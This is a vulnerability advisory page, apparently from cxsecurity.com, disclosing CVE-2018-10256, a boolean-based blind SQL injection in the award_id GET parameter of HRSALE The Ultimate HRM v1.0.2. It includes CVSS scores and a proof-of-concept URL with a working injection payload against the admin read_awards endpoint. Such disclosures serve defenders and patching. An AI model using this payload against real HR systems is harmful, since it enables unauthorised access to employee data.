HRSALE The Ultimate HRM v1.0.2 award_id SQL Injection

2018.04.26
Credit: 8bitsec
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: HRSALE The Ultimate HRM v1.0.2 - 'award_id' SQL Injection # Date: 2018-04-23 # Exploit Author: 8bitsec # CVE: CVE-2018-10256 # Vendor Homepage: https://codecanyon.net/ # Software Link: https://codecanyon.net/item/hrsale-the-ultimate-hrm/21665619 # Version: 1.0.2 # Tested on: [Kali Linux 2.0 | Mac OS 10.13] Release Date: ============= 2018-04-23 Product & Service Introduction: =============================== HRSALE provides you with a powerful and cost-effective HR platform to ensure you get the best from your employees and managers. Technical Details & Description: ================================ SQL injection on [award_id] parameter. Proof of Concept (PoC): ======================= SQLi: https://localhost/[path]/admin/user/read_awards/?jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS Parameter: award_id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: jd=1&is_ajax=1&mode=modal&data=view_award&award_id=1' AND 1303=1303 AND 'BzpS'='BzpS


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top